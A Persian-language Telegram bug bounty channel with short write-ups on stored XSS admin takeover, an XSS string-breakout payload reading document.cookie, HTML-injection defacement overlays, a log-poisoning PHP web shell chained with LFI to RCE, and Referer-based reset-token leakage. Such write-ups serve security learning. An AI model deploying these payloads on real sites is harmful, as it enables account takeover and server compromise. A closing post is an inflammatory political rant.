Life and Learning🎭 – Telegram
Life and Learning🎭
372 subscribers
55 photos
29 videos
11 files
61 links
Hello, welcome to my channel, I hope the posts of this channel add something to you

ADMIN:https://news.1rj.ru/str/AlI_VD2005
Twitter: https://x.com/CountMoteVaziri
Download Telegram
سناریو بالا که خدمتتون شرح دادم رو واقعیت روی سایتای ایرانی بیشتر دیدم ! و خیلی هم مرسومه (روی سایتایی زدم که توی حوزه خودشون حرفی برای گفتن دارن) پس تست کنید همیشه اگر بخوره واقعا باگ خفنی زدید!
در آخرم وقتی اومد و ادمین دید این درخواست برای سرور من اومد! و اینجا اشک شوق داشتم میریختم (علکی)!
خب دوستان اومدم با یه تجربه برگ ریزون دیگه از کار روی سایت ایرانی!

یه شرکتی روشون کار کردیم (بماندکه ادعا میکردن که ما خیلی امنیم) حدودا 5 تا باگ زدیم که از این 5 تا 3 تاش حیاتی بود 1 با سطح بسیار مهم و یکی هم مدیوم یا متوسط

آقا اینا سر مارو شیره مالیدن و کلا گفتن 20 تمن میدیم ( یه پیمنت پراسس زدم ازشون که قیمت خود اون 45 میلیون بود طبق تجربه بانتی های اخیر) بعد هیچی گفتیم باشه
گذشت و گذشت جنگ شد و اینا
بعد از جنگ گفتن آقا جنگه بزار دو تا قسط کنیم 20 میلیون رو دوتا 10 تمن بدیم
گفتیم باشه
بعد الان اومدن میگن به فکر اینیم که شرکت رو منحل کنیم و تعطیلش کنیم فعلا بیا 5 تمن بدیم بهتون تا ببینیم چطور میشه اوضاع 😐
روز به روز کار کردن روی وبسایت های ایرانی و توی ایران داره جالب تر و عجیب تر میشه
یعنی تو به یه هانتر خارجی بگی که من 5 تا باگ زدم از یه شرکت و بعد موقع بانتی دادن منحل شده شرکت به خدا اگر باورش شه 😑😑

آره دوستان باگ بزنید!

#تجربه
10
Life and Learning🎭
تا حالا شنده بودین که یکی ادمین و منیجر رو تیک اور کنه؟ اره تایتلش اینه : Stored XSS Via Bypass File Upload Lead to Full Account Take Over Superlevel Users چطور حالا بهش میرسیم؟ من خودم چندین بار این آسیب پذیری رو زدم و تقریبا 80 درصدش توی تیکت ها بوده …
بعضی وقتا سایت یه سری اپشن داره که خیلی خاصن مثل قسمت تیکت ها ، چت با هم تیمی ، چت با سایر کاربران ، چت با ربات ، چت با هوش مصنوعی و .... که اگر آسیب پذیری در قسمت تیکت ها بزنی معمولا سطح خوبی میگیرن چون با ادمین ها هستش اکسپلویت شدنش ، یعنی مخرب بودنش بیشتر از تاثیر روی یه کاربر عادیه حالا یعنی چی؟ما توی تیکت ها میایم و یه سوال یا یه درخواستی رو مطرح میکنیم و میفرستیم برای ادمین مروبطه یا تحت شرایطی برای مدیریت و آنها این پیغام رو میبینند و در نهایت روی اون ریپلای میزنند و پاسخ درخور شمارو میدن!
حالا آسیب پذیریش کجاس؟ بیاین بهتون بگم
👍6
در تیکت ها ما وقتی یه سوالی میپرسیم ، به یه حالت چت گونه ای پیغام ما توی صفحه HTML دیده میشه و در آنجا ذخیره میشه ! و همینطور هم از سمت ادمین هم همین اتفاق میوفته و پیغام ما برای ادمین نمایش داده میشه !

حالا اگر ما توی پیغاممون یه پیلود خطرناک که منجر به دزدیدن اکانت ادمین بشه بزاریم و بفرستیم چی میشه ؟ هیچ اکانت ادمین دستت میوفته و میتونی واردش بشی و سعی کنی سطح دسترسیت رو از طریق اپلود شل و .... بالا تر ببری

در اینجا منم همین کارو کردم اومدم بین پیغامم پیلود مخرب زدم که وقتی ادمین این پیام منو سین کرد سمتش یه اتفاقاتی بیوفته (که در این پیلود عمل خاصی اتفاق نمیوفته)
و و و حتی این پیلود من از سمت ادمین قابل رویت نیست ولی کار میکنه سمتش چرا؟ چون تگ اسکریپت مثل سایر تگ ها نیست که خروجیش دیده بشه و یا کدش دیده بشه برای همین دور از دید کاربر یا ادمین یا تارگت اعمال میشه!

و اینطوری ادمین رو تیک اور میکنن!!!!!!!!!!!!!

#باگ_بانتی | #رایتاپ
👏3👎1🤡1
خروجی کار هم به این صورت هستش که میتونید ببینید که پیغام به صورت عادی رفلکت شده

و در نهایت باید بگم که این آسیب پذیری در همه جا پیدا نمیشه و آسیب پذیری همه گیری نیست شاید در طول کل عمر کاری من 10 بار نشده تعداد این آسیب پذیری ولی خب تست کردنش خالی از لطف نیست!

#باگ_بانتی | #رایتاپ
👍6
در بعضی از سایت ها باید بشینین و تحلیل کنید که چطور با XSS میتونید برسید همیشه با پیلود های ساده نمیتونید دست پیدا کنید مثل این پیلود که خیلی عجیب و البته هوشمندانه بود !
https://example.com/?q=testsec'})});alert(document.cookie);$(function () { app.product.filter.init({ noscript: '


#باگ_بانتی | #رایتاپ
🔥41
بعضی وقتا شما یه HTML Injection کشف میکنید که میخواید از طریقش صفحه دیفیسی رو ترتیب بدید ولی نمیتونید ! پیلود زیر رو اول وارد میکنید
<div style='position: fixed; top: 0; left: 0; width: 100%; height: 100%;
background-color: rgba(0, 0, 0, 0.8); z-index: 9999;
display: flex; justify-content: center; align-items: center;
color: white; font-size: 2em; font-family: sans-serif;'>
تست آسیب پذیری در وبسایت هدف
</div>

ولی نتیجه نمیگیرید و اتربیوت و تگ استایل رو برنامه نویس بسته ولی شما نباید تسلیم بشید ! امروزه اکثر وبسایت ها دارن از بوت استرپ استفاده میکنن شما میتونید از طریق بوت استرپ این کار رو انجام بدید و همان خروجی را دریافت کنید با پیلود زیر
<div class='position-fixed top-0 start-0 w-100 h-100 d-flex justify-content-center align-items-center bg-dark bg-opacity-75 text-white fs-2' style='z-index: 9999;'>
تست آسیب‌پذیری در وب‌سایت
</div>


و اینطوری بود که یه آسیب پذیری روی یه وبسایت معروف ایرانی به نام .... ثبت شد!

#باگ_بانتی | #رایتاپ
6👍2😁1
تزریق لاگ سرور + LFI → RCE

1️⃣ برنامه ورودی کاربر (مثلاً User-Agent) را در یک فایل لاگ ذخیره می‌کند.

2️⃣ مهاجم کد PHP را تزریق می‌کند:

User-Agent: <?php system($_GET['cmd']); ?>

3️⃣ فایل لاگ در root ذخیره می‌شود: /logs/access.log

4️⃣ اگر آسیب‌پذیری LFI وجود داشته باشد:
/index?page=../../logs/access.log&cmd=id

Nullsecurityx
#باگ_بانتی | #رایتآپ
6
پستی از استاد منصوری!
👍8
Developer on the TOP!😁❤️
😁11
پستی از استاد منصوری!

نشت توکن بازنشانی رمز عبور از طریق Referer

اجازه بدید به زبان ساده و قدم به قدم توضیح بدم که این مشکل امنیتی (نشت توکن بازنشانی رمز عبور از طریق Referer) چیه و چطور اتفاق می‌افته:

1. کاربر درخواست بازنشانی رمز عبور می‌کنه:
فرض کنید شما رمز عبورتون رو فراموش کردید و توی یه وب‌سایت می‌خواید رمز جدید بسازید. توی صفحه بازنشانی رمز عبور، ایمیل‌تون (مثلاً v@mail.com) رو وارد می‌کنید و دکمه "ارسال" رو می‌زنید. وب‌سایت یه درخواست (POST) به سرورش می‌فرسته تا فرآیند بازنشانی شروع بشه.

2. وب‌سایت یه ایمیل با لینک بازنشانی می‌فرسته:
سرور وب‌سایت یه توکن (یه کد منحصربه‌فرد و موقت) تولید می‌کنه و یه لینک حاوی این توکن رو توی ایمیل براتون می‌فرسته. مثلاً لینکی مثل این:
https://example.com/reset?token=abc123
این لینک قرار هست شما رو به صفحه‌ای ببره که بتونید رمز جدید وارد کنید.

3. مشکل امنیتی توی بارگذاری تصویر خارجی:
وقتی روی لینک کلیک می‌کنید، مرورگرتون شما رو به صفحه بازنشانی رمز می‌بره. حالا فرض کنید این صفحه یه تصویر (مثلاً یه لوگو یا تبلیغ) از یه وب‌سایت دیگه (خارجی) بارگذاری می‌کنه. مرورگر شما برای لود کردن این تصویر، یه درخواست به سرور اون وب‌سایت خارجی می‌فرسته.

🔅توی این درخواست، مرورگر به‌طور خودکار آدرس صفحه‌ای که توش هستید (یعنی همون لینک بازنشانی با توکن) رو توی هدر Referer می‌فرسته. مثلاً:
Referer: https://example.com/reset?token=abc123
این یعنی توکن حساس شما به سرور اون وب‌سایت خارجی نشت می‌کنه!

4. مهاجم به توکن دسترسی پیدا می‌کنه:
اگه اون وب‌سایت خارجی مخرب باشه یا سرورش هک شده باشه، مهاجم می‌تونه هدر Referer رو ببینه و توکن شما رو بدزده. با داشتن این توکن، مهاجم می‌تونه به صفحه بازنشانی رمز بره و رمز عبور حساب شما رو عوض کنه.

چرا این خطرناکه⁉️
چون توکن بازنشانی رمز عبور مثل یه کلید موقت برای دسترسی به حساب شماست. اگه به دست غریبه بیفته، می‌تونن حساب شما رو کنترل کنن.

#باگ_بانتی | #امنیت
👍31
Forwarded from World Of Security
دوستان شودان برای ۲۴ ساعت اکانت membership رو رایگان کرده.
استفاده کنید ؛)
👎2
World Of Security
دوستان شودان برای ۲۴ ساعت اکانت membership رو رایگان کرده. استفاده کنید ؛)
دوستان رایگان نشده عضویتش با ۵ دلار شده فکر کنم! تاریخش تموم شده دوستان!!!!
👍4👌1
وقتی میگم که بعضی باگ های منجر به تصاحب اکانت phpyadmin میشه منظورم اینه !
🤯10🆒1
جدیدا در یه سری از ابزار هایی که برای هانت استفاده میکردم اینو خیلی دیدم واقعا متاسفام برای دنیا و اروپا !
11 سپتامبر یه هواپیما رفت و برج دوقولو رو زد و یه عمره دارن براش عذاداری میکنن ولی اسراییل داره چندین دهس که فلسطین رو زیر تیر میگیره کلی بچه ناقص شدن ، خیلی از مادرا مفقود شدن بچه هاشون ، کنده شدن اعضای بدن خانواده هاشون رو دیدن ، و تنها کاری که اروپا میکنه و نشست های بین الملل میکنن چیه ؟ بازخواست؟ اونا بازخواست میکنن و اینم نمیره چندین ساله همینه روند و این واقعا باعث تاسفه


امیدوارم که اتفاقی که همه مسلمان ها و مسیحیان منتظرشن اتفاق بیوفته و حق اسراییل و امریکا داده بشه و امیدوارم یه ذره کشور های عربی مثل عربستان به فکر بیوفته که دیگه گاو شیر ده نیست و نفر بعدی بعد فلسطین اونه !!!! و امیدوارم که تموم بشه!


#مرگ_بر_ظالمان_زمانه
15🕊3🤡2👍1👏1